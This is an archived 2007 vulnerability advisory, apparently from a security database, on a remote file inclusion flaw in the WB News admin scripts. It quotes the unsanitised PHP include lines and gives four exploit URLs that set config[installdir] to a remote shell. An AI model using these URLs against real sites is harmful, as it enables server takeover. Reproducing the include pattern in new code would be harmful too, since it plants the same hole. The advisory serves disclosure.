WB News Remote File Include in all versions

2007-03-02T00:00:00
ID SECURITYVULNS:DOC:16228
Type securityvulns
Reporter Securityvulns
Modified 2007-03-02T00:00:00

Description

ThE bug in admin file


>>To ConTacT mE @ www.Asb-May.net/bb >>ScRiPtS:-http://www.webmobo.com/wbnews/download.html >>GrEaTz To:-ToOofa-HaCk.eGy (All AsB-MaY DisCoverY ExPloIts GrOup) >>Discovered By:- ThE dE@Th <<{AsB-MaY DiScOvEr ExPlIoTs Gr0uP} >>


>>comment.php:- >>include $config['installdir']. "/includes/function.php"; >>themes.php:- >>include $config['installdir']."/templates/".$them['THEME_DIRECTORY']."/admin/theme_info.php"; >>directory.php:- >>include $config['installdir']."/templates/".$them['THEME_DIRECTORY']."/admin/theme_info.php"; >>sendmsg:- >>include $config['installdir']."/templates/".$them['THEME_DIRECTORY']."/admin/theme_info.php";


>>ExPlOiT:-http://www.SitE./[WBNewSPaTh]/admin/comment.php?config[installdir]=[Shell] >>ExPlOiT:-http://www.SitE./[WBNewSPaTh]/admin/themes.php?config[installdir]=[Shell] >>ExPlOiT:-http://www.SitE./[WBNewSPaTh]/admin/directory.php?config[installdir]=[Shell] >>ExPlOiT:-http://www.SitE./[WBNewSPaTh]/admin/sendmsg.php?config[installdir]=[Shell]